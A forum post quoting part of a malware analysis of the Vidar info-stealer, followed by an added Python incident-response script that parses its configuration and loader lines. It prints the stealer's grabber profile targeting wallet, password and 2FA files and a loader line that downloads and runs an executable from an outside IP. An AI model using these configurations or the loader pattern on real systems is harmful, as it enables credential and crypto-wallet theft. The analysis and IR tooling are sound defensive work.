Pirated software and its consequences: an analysis of the oldest and simplest viral foothold on the Internet
<blockquote data-quote="Ghosthunter" data-source="post: 502" data-attributes="member: 6">
<ol>
<li data-xf-list-type="ol">mozglue.dll</li>
<li data-xf-list-type="ol">msvcp140.dll</li>
<li data-xf-list-type="ol">nss3.dll</li>
<li data-xf-list-type="ol">softokn3.dll</li>
<li data-xf-list-type="ol">vcruntime140.dll</li>
<li data-xf-list-type="ol">msvcp140.dll</li>
</ol>
<p>It is also noteworthy that the downloaded DLL files will be saved in a separate folder created by the malware. It is located at the following path:</p>
<p>C:\ProgramData\local\dekddss\hyper\v\</p>
<p>As you can see, sqlite3.dll is missing here, because the stealer doesn't implement the method of data theft via SQL queries.</p>
<p>Then the stealer will make a request to the C&amp;C server to get a more detailed working configuration; this is implemented by the same request to the FACEIT API page.</p>
<p>It will contain 12 values separated by “*”:</p>
<p>1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\;*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*;50;true;movies:music:mp3;</p>
<p>This page may change depending on the attacker's preferences, but in most cases it is not modified.</p>
<p>If you read the previous article, you can guess that the process of collecting information about the victim's host will follow. The stealer will collect the following data:</p>
<ul>
<li data-xf-list-type="ul">username,</li>
<li data-xf-list-type="ul">operating system version,</li>
<li data-xf-list-type="ul">time zone and system time in file format,</li>
<li data-xf-list-type="ul">technical information: name of the processor, video card, and amount of RAM,</li>
<li data-xf-list-type="ul">installed applications and display tools (web cameras, monitors, etc.).</li>
</ul>
<p>The following code snippets responsible for this step were decoded:</p>
<p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/367/de7/4d6/367de74d67b1dabef38bfcec044d19c6.png" alt="367de74d67b1dabef38bfcec044d19c6.png" class="fr-fic fr-dii fr-draggable " style="" /></p>
<p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/72e/6f2/02c/72e6f202c9a662ececc661296d18895f.png" alt="72e6f202c9a662ececc661296d18895f.png" class="fr-fic fr-dii fr-draggable " style="" /></p>
<h4>5. Direct data theft</h4>
<p>Unlike its Raccoon counterpart, Vidar does not have the ability to interact with most browsers. Due to the missing DLL file sqlite3.dll, the functionality of this stealer is noticeably reduced. Therefore, the only thing it can do is steal cookies from Firefox. This is implemented via an additional file, mozglue3.dll, and a request to the logins.json file. Cookie theft is very limited, but if you consider that the number of active Firefox users at the end of the second quarter of 2022 was 198 million people per month, then there is no problem in this.</p>
<p>Next, the wallet.dat files are searched, and I remind you that this file contains the seed phrase and other information about the crypto wallet. This is only relevant for users of applications from crypto companies. It is also interesting that the malware is able to search for files with any extension.</p>
<p>But Vidar is still notable for some things: it is able to compress individual folders into a ZIP file and send them to the command server. This is done, rather, for convenience. Let's imagine the following picture: an attacker has successfully installed malware on the victim's device in some way, and let's assume that this was an attack on a specific person. The villain obviously knows what incriminating materials he needs to steal: photos, videos, and so on. Naturally, the victim, like most people, stores these materials in their respective folders. To avoid downloading files separately, it is much faster to compress the entire folder into a ZIP archive.</p>
<p>The archive name is unique for each device and consists of the MachineGuid.</p>
<p>Like Raccoon, this malware can take screenshots and send them to the command server. The screenshot below shows the code snippet responsible for this action:</p>
<p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/4b9/2b6/f8e/4b92b6f8e93a5866c4f60a8dfffe17cb.png" alt="4b92b6f8e93a5866c4f60a8dfffe17cb.png" class="fr-fic fr-dii fr-draggable " style="" /></p>
<p>This process is optional and is initiated by the attacker. The condition for performing this function is that the following line is present in the configuration file: scrnsht_</p>
<h4>6. Installing additional malware</h4>
<p>This step is mandatory and is always performed. The following line in the configuration file is responsible for this process:</p>
<p>ldr_1:<a href="http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/8465766547424604901.bin%7C%TEMP%/%7Cexe" target="_blank">http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/8465766547424604901.bin|%TEMP%\|exe</a></p>
<p>The choice of payload loaded by the malware is left to the attacker. The analyzed sample contained the usual Java Spybee keylogger, which is publicly available on the GitHub platform. A controversial choice. Why it was chosen is a mystery.</p>
<p><img src="https://habrastorage.org/r/w1560/getpro/habr/upload_files/e95/0da/1c8/e950da1c86292dc26fc4a5786fb2ecb7.png" alt="e950da1c86292dc26fc4a5786fb2ecb7.png" class="fr-fic fr-dii fr-draggable " style="" /></p>
<p>Also, this line shows an additional server that is currently unavailable, so it is still impossible to get deeper into the malware's infrastructure.</p>
</blockquote>
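The post quotes two configuration lines the stealer receives: the grabber profile returned by the C&amp;C (the "12 values" line with its file-name patterns, size field and excluded folders) and the ldr_1 loader line. For incident-response scoping it helps to turn both into structured data and check which files on a host the grabber profile would actually have collected. The Python below is an added example, not the stealer's code and not the post author's; the field meanings it assigns (the "50" as a per-file size cap in KB, "true" as a recursion flag, "Default" as the profile name), the case-insensitive matching, and the file listing it runs against are assumptions constructed for the example.

```python
"""Parse a Vidar-style grabber profile and ldr_ loader line, then work out
which files from a host listing the profile would have matched.
Added IR helper; field meanings are assumptions taken from the sample line."""
import fnmatch
import re
from dataclasses import dataclass
from typing import Iterable, List, Tuple
from urllib.parse import urlsplit

# Both lines are copied from the post; the file listing further down is constructed.
SAMPLE_CONFIG = (
    "1,1,1,1,1,1,1,1,1,1,250,Default;%DESKTOP%\\;"
    "*.txt:*.dat:*wallet*.*:*2fa*.*:*backup*.*:*code*.*:*password*.*:"
    "*auth*.*:*google*.*:*utc*.*:*UTC*.*:*crypt*.*:*key*.*;50;true;movies:music:mp3;"
)
SAMPLE_LOADER = (
    "ldr_1:http://93.184.220.29/9/U4N7B56F5K5A0L4L4T5/8465766547424604901.bin"
    "|%TEMP%\\|exe"
)


@dataclass
class GrabberProfile:
    values: List[str]         # the 12 comma-separated values; individual flags not decoded here
    name: str                 # assumption: the 12th value ("Default") names the profile
    root: str                 # folder the grabber starts from, e.g. %DESKTOP%\
    patterns: List[str]       # ':'-separated file-name globs
    max_size_kb: int          # assumption: per-file size cap in KB
    recursive: bool           # assumption: whether subfolders are walked
    excluded_dirs: List[str]  # ':'-separated folder names that are skipped (lower-cased)


@dataclass
class LoaderEntry:
    label: str     # "ldr_1"
    url: str       # where the payload is fetched from
    drop_dir: str  # where it is written, e.g. %TEMP%\
    kind: str      # how it is run, e.g. "exe"


def parse_config(line: str) -> GrabberProfile:
    """Split the ';'-separated grabber profile into named fields."""
    segs = line.rstrip(";").split(";")
    if len(segs) != 6:
        raise ValueError(f"expected 6 ';'-separated segments, got {len(segs)}")
    values = segs[0].split(",")
    if len(values) != 12:
        raise ValueError(f"expected 12 leading values, got {len(values)}")
    return GrabberProfile(
        values=values,
        name=values[-1],
        root=segs[1],
        patterns=[p for p in segs[2].split(":") if p],
        max_size_kb=int(segs[3]),
        recursive=segs[4].lower() == "true",
        excluded_dirs=[d.lower() for d in segs[5].split(":") if d],
    )


def parse_loader(line: str) -> LoaderEntry:
    """Split 'ldr_N:<url>|<drop dir>|<kind>' into its parts (first ':' only,
    because the URL itself contains one)."""
    label, _, rest = line.partition(":")
    parts = rest.split("|")
    if not label.startswith("ldr_") or len(parts) != 3:
        raise ValueError("not an ldr_ line")
    return LoaderEntry(label, parts[0], parts[1], parts[2])


def loader_iocs(entry: LoaderEntry) -> dict:
    """Pull the blockable pieces out of a loader line."""
    u = urlsplit(entry.url)
    return {"host": u.hostname, "path": u.path, "drop_dir": entry.drop_dir, "run_as": entry.kind}


def file_targeted(profile: GrabberProfile, relpath: str, size_kb: int) -> bool:
    """Would this profile collect relpath (relative to profile.root)?
    Matching is case-insensitive (assumption about Windows enumeration)."""
    parts = [p for p in re.split(r"[\\/]", relpath) if p]
    if not parts:
        return False
    dirs, name = parts[:-1], parts[-1].lower()
    if dirs and not profile.recursive:
        return False
    if any(d.lower() in profile.excluded_dirs for d in dirs):
        return False
    if size_kb > profile.max_size_kb:
        return False
    return any(fnmatch.fnmatchcase(name, pat.lower()) for pat in profile.patterns)


def targeted_files(profile: GrabberProfile, listing: Iterable[Tuple[str, int]]) -> List[str]:
    """listing: (relative path, size in KB) pairs; returns the paths the profile matches."""
    return [path for path, kb in listing if file_targeted(profile, path, kb)]


# Constructed host listing exercising the edge cases: excluded folder, size cap,
# case-insensitive extension, a folder name that looks interesting but whose file does not match.
SAMPLE_LISTING = [
    ("notes.txt", 3), ("wallet.dat", 12), ("README.TXT", 1),
    ("movies/trailer.txt", 2), ("work/backup_2022.zip", 40),
    ("holiday.jpg", 900), ("keys/id_rsa", 4), ("big_export.txt", 4096),
]

if __name__ == "__main__":
    prof = parse_config(SAMPLE_CONFIG)
    print(loader_iocs(parse_loader(SAMPLE_LOADER)))
    print(targeted_files(prof, SAMPLE_LISTING))
```

Running it against a real Desktop listing (path plus size) tells you which documents should be treated as exposed after an infection, which is the list that matters for credential rotation and user notification; the loader IOCs are what goes into the proxy and EDR blocklists.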